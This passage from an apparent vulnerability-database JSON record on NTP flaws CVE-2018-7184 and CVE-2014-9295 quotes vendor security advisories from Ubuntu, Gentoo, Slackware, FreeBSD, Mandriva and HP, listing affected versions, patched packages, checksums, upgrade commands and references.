4.2.8p4 before 4.2.8p11 drops bad packets before updating the \"received\" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. \nVersions prior to NTP 4.2.8p11 are vulnerable. ntpd is one of the operating system daemons. ==========================================================================\nUbuntu Security Notice USN-3707-1\nJuly 09, 2018\n\nntp vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n- Ubuntu 17.10\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nYihan Lian discovered that NTP incorrectly handled certain malformed mode 6\npackets. This issue only affected Ubuntu\n17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. This issue only affected Ubuntu 17.10 and Ubuntu\n18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. (CVE-2018-7185)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n ntp 1:4.2.8p10+dfsg-5ubuntu7.1\n\nUbuntu 17.10:\n ntp 1:4.2.8p10+dfsg-5ubuntu3.3\n\nUbuntu 16.04 LTS:\n ntp 1:4.2.8p4+dfsg-3ubuntu5.9\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.13\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n https://usn.ubuntu.com/usn/usn-3707-1\n CVE-2018-7182, CVE-2018-7183, CVE-2018-7184, CVE-2018-7185\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu7.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu3.3\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.9\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.13\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201805-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: May 26, 2018\n Bugs: #649612\n ID: 201805-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to remote code execution. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p11 \u003e= 4.2.8_p11 \n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p11\"\n\nReferences\n==========\n\n[ 1 ] CVE-2018-7170\n https://nvd.nist.gov/vuln/detail/CVE-2018-7170\n[ 2 ] CVE-2018-7182\n https://nvd.nist.gov/vuln/detail/CVE-2018-7182\n[ 3 ] CVE-2018-7183\n https://nvd.nist.gov/vuln/detail/CVE-2018-7183\n[ 4 ] CVE-2018-7184\n https://nvd.nist.gov/vuln/detail/CVE-2018-7184\n[ 5 ] CVE-2018-7185\n https://nvd.nist.gov/vuln/detail/CVE-2018-7185\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201805-12\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2018 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] ntp (SSA:2018-060-02)\n\nNew ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. \n This release addresses five security issues in ntpd:\n * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability:\n ephemeral association attack. While fixed in ntp-4.2.8p7, there are\n significant additional protections for this issue in 4.2.8p11. \n Reported by Matt Van Gundy of Cisco. \n * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer\n read overrun leads to undefined behavior and information leak. \n Reported by Yihan Lian of Qihoo 360. \n * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated\n ephemeral associations. Reported on the questions@ list. \n * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode\n cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. \n * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet\n can reset authenticated interleaved association. \n Reported by Miroslav Lichvar of Red Hat. \n For more information, see:\n http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p11-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p11-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n01c86ddfabec68d52877336258d064c7 ntp-4.2.8p11-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nb2d36d96f9a4d84df3586d38b8b47389 ntp-4.2.8p11-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n78b4e9221e725dcb45160950bfc926d0 ntp-4.2.8p11-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0d32ed484e02ad28c59838e6407d549 ntp-4.2.8p11-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n81690d8e511b403f0fe89c1d120f5049 ntp-4.2.8p11-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nd2c877e3d1b9c7ce003ef090c7610c74 ntp-4.2.8p11-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nc3ee95d3944b09c2e891883dc5411a6f n/ntp-4.2.8p11-i586-1.txz\n\nSlackware x86_64 -current package:\nfa9c7a8aca0c769791e34a8e48e6d260 n/ntp-4.2.8p11-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p11-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAlqYjI8ACgkQakRjwEAQIjM5rACfdDAWRxL2nQATj8HFDPgCVInK\n13MAnR04OluKfiEsJVgO6uWJKXy2HOGq\n=FRx7\n-----END PGP SIGNATURE-----\n", "sources": [ { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "BID", "id": "103192" }, { "db": "VULHUB", "id": "VHN-137216" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" } ], "trust": 2.25 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-7184", "trust": 3.1 }, { "db": "BID", "id": "103192", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "146631", "trust": 1.8 }, { "db": "JVNDB", "id": "JVNDB-2018-002749", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201803-142", "trust": 0.7 }, { "db": "VULHUB", "id": "VHN-137216", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "148455", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147917", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137216" }, { "db": "BID", "id": "103192" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "id": "VAR-201803-1821", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-137216" } ], "trust": 0.01 }, "last_update_date": "2023-12-18T11:14:01.210000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "NTP Bug 3453", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/ntpbug3453" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.slackware.com/" }, { "title": "Synology-SA-18:13", "trust": 0.8, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "title": "NTP ntpd Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=78916" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-noinfo", "trust": 1.0 }, { "problemtype": "CWE-20", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137216" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "NVD", "id": "CVE-2018-7184" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.securityfocus.com/bid/103192" }, { "trust": 2.3, "url": "http://packetstormsecurity.com/files/146631/slackware-security-advisory-ntp-updates.html" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/ntpbug3453" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201805-12" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/541824/100/0/threaded" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20180626-0001/" }, { "trust": 1.7, "url": "https://www.synology.com/support/security/synology_sa_18_13" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-18:02.ntp.asc" }, { "trust": 1.7, "url": "https://usn.ubuntu.com/3707-1/" }, { "trust": 1.6, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbux03962en_us" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7184" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7184" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1550218" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2018-7184" }, { "trust": 0.3, "url": "https://www.oracle.com/technetwork/topics/security/bulletinapr2018-4443185.html" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7185" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7182" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7183" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7170" }, { "trust": 0.1, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbux03962en_us" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/usn/usn-3707-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.9" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu3.3" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p10+dfsg-5ubuntu7.1" }, { "trust": 0.1, "url": "https://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7182" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7185" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7170" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#february_2018_ntp_4_2_8p11_ntp_s" } ], "sources": [ { "db": "VULHUB", "id": "VHN-137216" }, { "db": "BID", "id": "103192" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-137216" }, { "db": "BID", "id": "103192" }, { "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "PACKETSTORM", "id": "146631" }, { "db": "NVD", "id": "CVE-2018-7184" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-03-06T00:00:00", "db": "VULHUB", "id": "VHN-137216" }, { "date": "2018-02-27T00:00:00", "db": "BID", "id": "103192" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "date": "2018-07-09T23:38:43", "db": "PACKETSTORM", "id": "148455" }, { "date": "2018-05-26T22:55:24", "db": "PACKETSTORM", "id": "147917" }, { "date": "2018-03-01T23:35:00", "db": "PACKETSTORM", "id": "146631" }, { "date": "2018-03-06T20:29:01.437000", "db": "NVD", "id": "CVE-2018-7184" }, { "date": "2018-03-07T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-137216" }, { "date": "2018-08-15T10:00:00", "db": "BID", "id": "103192" }, { "date": "2018-04-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-002749" }, { "date": "2020-08-24T17:37:01.140000", "db": "NVD", "id": "CVE-2018-7184" }, { "date": "2020-10-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201803-142" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "148455" }, { "db": "PACKETSTORM", "id": "147917" }, { "db": "CNNVD", "id": "CNNVD-201803-142" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ntp Input validation vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-002749" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201803-142" } ], "trust": 0.6 } }
var-201412-0613
Vulnerability from variot
Multiple stack-based buffer overflows in ntpd in NTP before 4.2.8 allow remote attackers to execute arbitrary code via a crafted packet, related to (1) the crypto_recv function when the Autokey Authentication feature is used, (2) the ctl_putdata function, and (3) the configure function. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Network Time Protocol is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successful exploits may allow an attacker to execute arbitrary code with the privileges of the ntpd process. Failed attempts will likely cause a denial-of-service condition. Network Time Protocol 4.2.7 and prior are vulnerable. Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE) 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3) 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15) 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE) 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7) 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17) 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24) 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE) 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21) CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
II. [CVE-2014-9293] The ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9296]
III. Impact
The NTP protocol uses keys to implement authentication. The weak seeding of the pseudo-random number generator makes it easier for an attacker to brute-force keys, and thus may broadcast incorrect time stamps or masquerade as another time server. [CVE-2014-9295]
IV. Workaround
No workaround is available, but systems not running ntpd(8) are not affected. Because the issue may lead to remote root compromise, the FreeBSD Security Team recommends system administrators to firewall NTP ports, namely tcp/123 and udp/123 when it is not clear that all systems have been patched or have ntpd(8) stopped.
V.
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch
fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc
gpg --verify ntp.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart the ntpd(8) daemons, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r276073 releng/8.4/ r276154 stable/9/ r276073 releng/9.1/ r276155 releng/9.2/ r276156 releng/9.3/ r276157 stable/10/ r276072 releng/10.0/ r276158 releng/10.1/ r276159
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. This situation may be exploitable by an attacker (CVE-2014-9296).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 http://advisories.mageia.org/MGASA-2014-0541.html
Updated Packages:
Mandriva Business Server 1/X86_64: 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFUqn7vmqjQ0CJFipgRAhTAAKCfH+XdZfDmtmE7lgzpV939wjHFdgCfZWiZ l2lk5bD8X4tOzwVyLnhX7Dg= =JIIF -----END PGP SIGNATURE----- .
See the RESOLUTION section for a list of impacted hardware and Comware 5, Comware 5 Low Encryption SW, Comware 7, and VCX versions. Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted CVE #
8800 (Comware 5) R3627P04 JC137A HP 8805/8808/8812 (2E) Main Control Unit Module, JC138A HP 8805/8808/8812 (1E) Main Control Unit Module, JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP 8805 Router Chassis, JC148B HP 8805 Router Chassis, JC149A HP 8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP 8812 Router Chassis, JC150B HP 8812 Router Chassis, JC596A HP 8800 Dual Fabric Main Processing Unit, JC597A HP 8800 Single Fabric Main Processing Unit
CVE-2014-9295
A6600 (Comware 5) R3303P18 JC165A HP 6600 RPE-X1 Router Module, JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit, JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6602 (Comware 5) R3303P18 JC176A HP 6602 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6800 (Comware 5) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
MSR20 (Comware 5) R2513P45 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20 Router
CVE-2014-9295
MSR20-1X (Comware 5) R2513P45 JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router, JD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service Router, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW Multi-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP MSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router, JD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1 Multi-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router (NA), JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12 (0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR 20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R), H3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W (0235A32G) CVE-2014-9295
